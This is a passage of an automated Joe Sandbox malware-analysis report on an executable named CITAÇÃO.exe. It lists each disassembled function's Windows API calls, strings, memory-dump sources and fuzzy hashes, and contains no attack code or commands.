                                                      • Associated: 00000000.00000002.1780079950.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1780079950.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1780156112.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_0_2_400000_CITA#U00c7#U00c3O.jbxd
                                                      Similarity
                                                      • API ID: _strncmp
                                                      • String ID: '$DEFINE$\$`$h$h
                                                      • API String ID: 909875538-3708680428
                                                      • Opcode ID: c0119b86fdbff93204f49aa9905b13b9b84c98abe9b4d8f4a229c1acd795ed82
                                                      • Instruction ID: 816ce89e9d314c50cae2ff635e2dae77420ade2a81b985ada7b38a9c48760da0
                                                      • Opcode Fuzzy Hash: c0119b86fdbff93204f49aa9905b13b9b84c98abe9b4d8f4a229c1acd795ed82
                                                      • Instruction Fuzzy Hash: C502B470A042498FEF14CF69C9906AEBBF2FF85304F2481AED8459B341D7399946CB55
                                                      Function 004542ED Relevance: 16.0, APIs: 8, Strings: 1, Instructions: 271libraryloaderCOMMON
                                                      Download Yara Rule
                                                      APIs
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.1779900453.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                      • Associated: 00000000.00000002.1779848659.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1779985735.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1780005188.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1780057028.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1780079950.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1780079950.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1780156112.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_0_2_400000_CITA#U00c7#U00c3O.jbxd
                                                      Similarity
                                                      • API ID: AddressProc_free_malloc$_strcat_strlen
                                                      • String ID: AU3_FreeVar
                                                      • API String ID: 2634073740-771828931
                                                      • Opcode ID: b7b62cf44ead268743cea15c23fa0702c80810b5d7796ec40f0430e9877b9643
                                                      • Instruction ID: 8d08e60933d1045585c44e473594da8d0bbfd8a8652ecee4fcef853dc29158a1
                                                      • Opcode Fuzzy Hash: b7b62cf44ead268743cea15c23fa0702c80810b5d7796ec40f0430e9877b9643
                                                      • Instruction Fuzzy Hash: 00B1ADB4A00206DFCB00DF55C880A6AB7A5FF88319F2485AEED058F352D739ED95CB94
                                                      Function 0046C5FA Relevance: 16.0, APIs: 6, Strings: 3, Instructions: 208comCOMMON
                                                      Download Yara Rule
                                                      APIs
                                                      • CoInitialize.OLE32 ref: 0046C63A
                                                      • CoUninitialize.OLE32 ref: 0046C645
                                                        • Part of subcall function 004115D7: _malloc.LIBCMT ref: 004115F1
                                                        • Part of subcall function 0044CB87: CreateDispTypeInfo.OLEAUT32(?,00000800,?), ref: 0044CBD4
                                                        • Part of subcall function 0044CB87: CreateStdDispatch.OLEAUT32(00000000,?,?,?), ref: 0044CBF4
                                                      • CLSIDFromProgID.OLE32(00000000,?), ref: 0046C694
                                                      • CLSIDFromString.OLE32(00000000,?), ref: 0046C6A4
                                                      • CoCreateInstance.OLE32(?,00000000,00000017,00482998,?), ref: 0046C6CD
                                                      • IIDFromString.OLE32(?,?), ref: 0046C705
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.1779900453.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                      • Associated: 00000000.00000002.1779848659.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1779985735.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1780005188.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1780057028.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1780079950.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1780079950.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1780156112.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_0_2_400000_CITA#U00c7#U00c3O.jbxd
                                                      Similarity
                                                      • API ID: CreateFrom$String$DispDispatchInfoInitializeInstanceProgTypeUninitialize_malloc
                                                      • String ID: Failed to create object$Invalid parameter$NULL Pointer assignment
                                                      • API String ID: 2294789929-1287834457
                                                      • Opcode ID: 4dfaed0549f409efa28524cf643488acd2e6b782f2d71f2a42dfc1cbbaa944b5
                                                      • Instruction ID: adb6a6f601bf1a612e569d1fac1689f55b30b767fcafa950e0578031a668eb85
                                                      • Opcode Fuzzy Hash: 4dfaed0549f409efa28524cf643488acd2e6b782f2d71f2a42dfc1cbbaa944b5
                                                      • Instruction Fuzzy Hash: B861BC712043019FD710EF21D885B7BB3E8FB84715F10891EF9859B241E779E909CBAA
                                                      Function 004710F1 Relevance: 15.9, APIs: 7, Strings: 2, Instructions: 157windowCOMMON
                                                      Download Yara Rule
                                                      APIs
                                                        • Part of subcall function 00456391: GetCursorPos.USER32(?), ref: 004563A6
                                                        • Part of subcall function 00456391: ScreenToClient.USER32(?,?), ref: 004563C3
                                                        • Part of subcall function 00456391: GetAsyncKeyState.USER32(?), ref: 00456400
                                                        • Part of subcall function 00456391: GetAsyncKeyState.USER32(?), ref: 00456410
                                                      • DefDlgProcW.USER32(?,00000205,?,?), ref: 00471145
                                                      • ImageList_DragLeave.COMCTL32(00000000), ref: 00471163
                                                      • ImageList_EndDrag.COMCTL32 ref: 00471169
                                                      • ReleaseCapture.USER32 ref: 0047116F
                                                      • SetWindowTextW.USER32(?,00000000), ref: 00471206
                                                      • SendMessageW.USER32(?,000000B1,00000000,000000FF), ref: 00471216
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.1779900453.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                      • Associated: 00000000.00000002.1779848659.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1779985735.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1780005188.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1780057028.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1780079950.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1780079950.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1780156112.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_0_2_400000_CITA#U00c7#U00c3O.jbxd
                                                      Similarity
                                                      • API ID: AsyncDragImageList_State$CaptureClientCursorLeaveMessageProcReleaseScreenSendTextWindow
                                                      • String ID: @GUI_DRAGFILE$@GUI_DROPID
                                                      • API String ID: 2483343779-2107944366
                                                      • Opcode ID: 0c0f1ff16893fa866466cf5bd33a163e2c592d09522a7afef5934b76f638d362
                                                      • Instruction ID: f70d9246110d4513cc5ea0640624bfdb04bec8758509bedf4130776013c57ff9
                                                      • Opcode Fuzzy Hash: 0c0f1ff16893fa866466cf5bd33a163e2c592d09522a7afef5934b76f638d362
                                                      • Instruction Fuzzy Hash: D751E5706002109FD700EF59CC85BAF77A5FB89310F004A6EF945A72E2DB789D45CBAA
                                                      Function 004505F0 Relevance: 15.9, APIs: 7, Strings: 2, Instructions: 147windowCOMMON
                                                      Download Yara Rule
                                                      APIs
                                                      • SendMessageW.USER32(00000000,00001036,00000010,00000010), ref: 004506A0
                                                      • SendMessageW.USER32(00000000,00001036,00000000,?), ref: 004506B4
                                                      • SetWindowPos.USER32(?,00000000,00000000,00000000,00000000,00000000,00000013), ref: 004506D5
                                                      • _wcslen.LIBCMT ref: 00450720
                                                      • _wcscat.LIBCMT ref: 00450733
                                                      • SendMessageW.USER32(?,00001057,00000000,?), ref: 0045074C
                                                      • SendMessageW.USER32(?,00001061,?,?), ref: 0045077E
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.1779900453.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                      • Associated: 00000000.00000002.1779848659.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1779985735.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1780005188.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1780057028.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1780079950.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1780079950.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1780156112.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_0_2_400000_CITA#U00c7#U00c3O.jbxd
                                                      Similarity
                                                      • API ID: MessageSend$Window_wcscat_wcslen
                                                      • String ID: -----$SysListView32
                                                      • API String ID: 4008455318-3975388722
                                                      • Opcode ID: ffec743b0eb36e838b163f32d05296d45530ca8b23685d337e61e8ea6b23e255
                                                      • Instruction ID: d83f74bd31ff7b91e94eebeff09b40632409ca0fd113a8de7250d6f1aa6a1b31
                                                      • Opcode Fuzzy Hash: ffec743b0eb36e838b163f32d05296d45530ca8b23685d337e61e8ea6b23e255
                                                      • Instruction Fuzzy Hash: 9C51D470500308ABDB24CF64CD89FEE77A5EF98304F10065EF944A72C2D3B99959CB58
                                                      Function 00469BF3 Relevance: 15.8, APIs: 7, Strings: 2, Instructions: 88windowCOMMON
                                                      Download Yara Rule
                                                      APIs
                                                        • Part of subcall function 00401B10: _wcslen.LIBCMT ref: 00401B11
                                                        • Part of subcall function 00401B10: _memmove.LIBCMT ref: 00401B57
                                                      • SendMessageW.USER32(00000000,0000018C,000000FF,00000000), ref: 00469C73
                                                      • GetDlgCtrlID.USER32(00000000), ref: 00469C84
                                                      • GetParent.USER32 ref: 00469C98
                                                      • SendMessageW.USER32(00000000,?,00000111), ref: 00469C9F
                                                      • GetDlgCtrlID.USER32(00000000), ref: 00469CA5
                                                      • GetParent.USER32 ref: 00469CBC
                                                      • SendMessageW.USER32(00000000,?,00000111,?), ref: 00469CC3
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.1779900453.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                      • Associated: 00000000.00000002.1779848659.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1779985735.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1780005188.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1780057028.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1780079950.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1780079950.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1780156112.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_0_2_400000_CITA#U00c7#U00c3O.jbxd
                                                      Similarity
                                                      • API ID: MessageSend$CtrlParent$_memmove_wcslen
                                                      • String ID: ComboBox$ListBox
                                                      • API String ID: 2360848162-1403004172
                                                      • Opcode ID: 7a27601cbaa80f740c595597d901cdf30e8ed390f6d586fa417b55efe09de5c4
                                                      • Instruction ID: b77daa4920d68b7dc7b38413de7e2b04daab878370679d8231203fb1b5b646ea
                                                      • Opcode Fuzzy Hash: 7a27601cbaa80f740c595597d901cdf30e8ed390f6d586fa417b55efe09de5c4
                                                      • Instruction Fuzzy Hash: 0121E7716001187BDB00AB69CC85ABF779CEB85320F00855BFA149B2D1D6B8D845C7A5
                                                      Function 0045DC4C Relevance: 15.2, APIs: 10, Instructions: 190COMMON
                                                      Download Yara Rule
                                                      APIs
                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.1779900453.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                      • Associated: 00000000.00000002.1779848659.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1779985735.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1780005188.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1780057028.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1780079950.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1780079950.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1780156112.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_0_2_400000_CITA#U00c7#U00c3O.jbxd
                                                      Similarity
                                                      • API ID: _wcscpy$FolderUninitialize$BrowseDesktopFromInitializeListMallocPath
                                                      • String ID:
                                                      • API String ID: 262282135-0
                                                      • Opcode ID: 6572a5b0ab20a3b352b20f616e179ebe31bc85c3400954ff5f88a0c3e804af97
                                                      • Instruction ID: f209a7e015878e5ef66622a864ec89938c936514b9877fb167e893f071c19078
                                                      • Opcode Fuzzy Hash: 6572a5b0ab20a3b352b20f616e179ebe31bc85c3400954ff5f88a0c3e804af97
                                                      • Instruction Fuzzy Hash: 25718275900208AFCB14EF95C9849DEB7B9EF88304F00899AE9099B312D735EE45CF64
                                                      Function 00448123 Relevance: 15.2, APIs: 10, Instructions: 187windowCOMMON
                                                      Download Yara Rule
                                                      APIs
                                                      • SendMessageW.USER32(?,0000101F,00000000,00000000), ref: 004481A8
                                                      • SendMessageW.USER32(00000000,?,0000101F,00000000), ref: 004481AB
                                                      • GetWindowLongW.USER32(?,000000F0), ref: 004481CF
                                                      • SendMessageW.USER32(?,00001004,00000000,00000000), ref: 004481F2
                                                      • SendMessageW.USER32(?,0000104D,00000000,00000007), ref: 00448266
                                                      • SendMessageW.USER32(?,00001074,?,00000007), ref: 004482B4
                                                      • SendMessageW.USER32(?,00001057,00000000,00000000), ref: 004482CF
                                                      • SendMessageW.USER32(?,0000101D,00000001,00000000), ref: 004482F1
                                                      • SendMessageW.USER32(?,0000101E,00000001,?), ref: 00448308
                                                      • SendMessageW.USER32(?,00001008,?,00000007), ref: 00448320
                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.1779900453.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                      • Associated: 00000000.00000002.1779848659.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1779985735.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1780005188.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1780057028.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1780079950.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1780079950.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1780156112.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_0_2_400000_CITA#U00c7#U00c3O.jbxd
                                                      Similarity
                                                      • API ID: MessageSend$LongWindow
                                                      • String ID:
                                                      • API String ID: 312131281-0
                                                      • Opcode ID: 6a3a0ce9ab1f2311975bf00a061da1b0f9e556c56634a45a126b5d9c196b7e2c
                                                      • Instruction ID: c7c5d5d6f9bf0949bb943eac7ac5a8ec30049dd2ce11923e35461b50cec8bdb0
                                                      • Opcode Fuzzy Hash: 6a3a0ce9ab1f2311975bf00a061da1b0f9e556c56634a45a126b5d9c196b7e2c
                                                      • Instruction Fuzzy Hash: 97617C70A00208AFEB10DF94DC81FEE77B9FF49714F10429AF914AB291DBB5AA41CB54
                                                      Function 00448D62 Relevance: 15.2, APIs: 10, Instructions: 174windowCOMMON
                                                      Download Yara Rule
                                                      APIs
                                                        • Part of subcall function 004413AA: DeleteObject.GDI32(?), ref: 0044140B
                                                      • SendMessageW.USER32(75C123D0,00001001,00000000,?), ref: 00448E16
                                                      • SendMessageW.USER32(75C123D0,00001026,00000000,?), ref: 00448E25
                                                        • Part of subcall function 00441432: CreateSolidBrush.GDI32(?), ref: 0044147E
                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.1779900453.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                      • Associated: 00000000.00000002.1779848659.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1779985735.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1780005188.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1780057028.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1780079950.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1780079950.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1780156112.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_0_2_400000_CITA#U00c7#U00c3O.jbxd
                                                      Similarity
                                                      • API ID: MessageSend$BrushCreateDeleteObjectSolid
                                                      • String ID:
                                                      • API String ID: 3771399671-0
                                                      • Opcode ID: 36703352345276820fdd923f04099b07a85a16fcace37fcd15d9f96d3dbdb764
                                                      • Instruction ID: 7c26134f999fedcb31daf2d1c178305a5bad5d5d588b7e0560cc3c70a69cf84e
                                                      • Opcode Fuzzy Hash: 36703352345276820fdd923f04099b07a85a16fcace37fcd15d9f96d3dbdb764
                                                      • Instruction Fuzzy Hash: C7511570300214ABF720DF24DC85FAE77A9EF14724F10491EFA59AB291CB79E9498B18
                                                      Function 00434621 Relevance: 15.1, APIs: 10, Instructions: 98threadCOMMON
                                                      Download Yara Rule
                                                      APIs
                                                      • GetCurrentThreadId.KERNEL32 ref: 00434643
                                                      • GetForegroundWindow.USER32(00000000), ref: 00434655
                                                      • GetWindowThreadProcessId.USER32(00000000), ref: 0043465C
                                                      • AttachThreadInput.USER32(00000000,00000000,00000001), ref: 00434671
                                                      • GetWindowThreadProcessId.USER32(?,?), ref: 0043467F
                                                      • AttachThreadInput.USER32(00000000,00000000,00000001), ref: 00434698
                                                      • AttachThreadInput.USER32(00000000,00000000,00000001), ref: 004346A6
                                                      • AttachThreadInput.USER32(00000000,00000000,00000000), ref: 004346F3
                                                      • AttachThreadInput.USER32(00000000,00000000,00000000), ref: 00434707
                                                      • AttachThreadInput.USER32(00000000,00000000,00000000), ref: 00434712
                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.1779900453.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                      • Associated: 00000000.00000002.1779848659.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1779985735.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1780005188.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1780057028.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1780079950.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1780079950.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1780156112.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_0_2_400000_CITA#U00c7#U00c3O.jbxd
                                                      Similarity
                                                      • API ID: Thread$AttachInput$Window$Process$CurrentForeground
                                                      • String ID:
                                                      • API String ID: 2156557900-0
                                                      • Opcode ID: 67cee910062edc5350ae4d2b9d1366d6ad4b01d413104696f98c87e4c7643c1b
                                                      • Instruction ID: 33c2ceff45d8cb0672f592c0823183733d26e7ad7419b63083ab10cfbc882f35
                                                      • Opcode Fuzzy Hash: 67cee910062edc5350ae4d2b9d1366d6ad4b01d413104696f98c87e4c7643c1b
                                                      • Instruction Fuzzy Hash: 98313EB2600204BFDB11DF69DC859AEB7A9FB9A310F00552AF905D7250E778AD40CB6C
                                                      Function 0046943F Relevance: 14.3, APIs: 2, Strings: 6, Instructions: 287COMMON
                                                      Download Yara Rule
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.1779900453.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                      • Associated: 00000000.00000002.1779848659.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1779985735.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1780005188.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1780057028.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1780079950.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1780079950.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1780156112.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_0_2_400000_CITA#U00c7#U00c3O.jbxd
                                                      Similarity
                                                      • API ID:
                                                      • String ID: CLASS$CLASSNN$INSTANCE$NAME$REGEXPCLASS$TEXT
                                                      • API String ID: 0-1603158881
                                                      • Opcode ID: b2205c720eb57eaa9acd20c5cdad8c47631596d61f09c649adc7dd6ac6f1094b
                                                      • Instruction ID: 400245e8055df5988f0e80dfbae95eacb55e3b8a933f722a5dc1e2c8929bf265
                                                      • Opcode Fuzzy Hash: b2205c720eb57eaa9acd20c5cdad8c47631596d61f09c649adc7dd6ac6f1094b
                                                      • Instruction Fuzzy Hash: FAA162B5800204ABDF00EF61D8C1BEA3368AF54349F58857BEC096B146EB7D6909D77A
                                                      Function 004485CB Relevance: 14.1, APIs: 7, Strings: 1, Instructions: 109windowCOMMON
                                                      Download Yara Rule
                                                      APIs
                                                      • CreateMenu.USER32 ref: 00448603
                                                      • SetMenu.USER32(?,00000000), ref: 00448613
                                                      • GetMenuItemInfoW.USER32(?,?,00000000,00000030), ref: 00448697
                                                      • IsMenu.USER32(?), ref: 004486AB
                                                      • CreatePopupMenu.USER32 ref: 004486B5
                                                      • InsertMenuItemW.USER32(?,?,00000001,00000030), ref: 004486EC
                                                      • DrawMenuBar.USER32 ref: 004486F5
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.1779900453.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                      • Associated: 00000000.00000002.1779848659.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1779985735.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1780005188.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1780057028.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1780079950.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1780079950.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1780156112.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_0_2_400000_CITA#U00c7#U00c3O.jbxd
                                                      Similarity
                                                      • API ID: Menu$CreateItem$DrawInfoInsertPopup
                                                      • String ID: 0
                                                      • API String ID: 161812096-4108050209
                                                      • Opcode ID: 5f9c542d8f07ae56d95057f828c3334b95156dd137b7db0efda9360fb5a3d221
                                                      • Instruction ID: 1651b4fd0bf3e4e6d8e032b2651979207be8780685d2f09cc615cc8e1c1775d8
                                                      • Opcode Fuzzy Hash: 5f9c542d8f07ae56d95057f828c3334b95156dd137b7db0efda9360fb5a3d221
                                                      • Instruction Fuzzy Hash: 9D418B75A01209AFEB40DF98D884ADEB7B4FF49314F10815EED189B340DB74A851CFA8
                                                      Function 00434034 Relevance: 14.0, APIs: 6, Strings: 2, Instructions: 49windowCOMMON
                                                      Download Yara Rule
                                                      APIs
                                                      • GetModuleHandleW.KERNEL32(00000000,004A90E8,?,00000100,?,C:\Users\user\Desktop\CITA#U00c7#U00c3O.exe), ref: 00434057
                                                      • LoadStringW.USER32(00000000), ref: 00434060
                                                      • GetModuleHandleW.KERNEL32(00000000,00001389,?,00000100), ref: 00434075
                                                      • LoadStringW.USER32(00000000), ref: 00434078
                                                      • _wprintf.LIBCMT ref: 004340A1
                                                      • MessageBoxW.USER32(00000000,?,?,00011010), ref: 004340B9
                                                      Strings
                                                      • %s (%d) : ==> %s: %s %s, xrefs: 0043409C
                                                      • C:\Users\user\Desktop\CITA#U00c7#U00c3O.exe, xrefs: 00434040
                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.1779900453.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                      • Associated: 00000000.00000002.1779848659.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1779985735.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1780005188.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1780057028.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1780079950.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1780079950.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1780156112.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_0_2_400000_CITA#U00c7#U00c3O.jbxd
                                                      Similarity
                                                      • API ID: HandleLoadModuleString$Message_wprintf
                                                      • String ID: %s (%d) : ==> %s: %s %s$C:\Users\user\Desktop\CITA#U00c7#U00c3O.exe
                                                      • API String ID: 3648134473-3681433116
                                                      • Opcode ID: 5806584fae846cee426602f55e287a2c1afdddb79e6f9c87a69d5249cd46d2cb
                                                      • Instruction ID: 3f99f1473d628bc1a501e0113e735bb0cc043e2cca9b2706ac47da9b95460e2a
                                                      • Opcode Fuzzy Hash: 5806584fae846cee426602f55e287a2c1afdddb79e6f9c87a69d5249cd46d2cb
                                                      • Instruction Fuzzy Hash: EB016CB26903187EE710E754DD06FFA376CEBC4B11F00459AB708A61C49AF469848BB5
                                                      Function 0047679F Relevance: 13.8, APIs: 9, Instructions: 307COMMON
                                                      Download Yara Rule
                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.1779900453.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                      • Associated: 00000000.00000002.1779848659.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1779985735.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1780005188.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1780057028.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1780079950.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1780079950.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1780156112.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
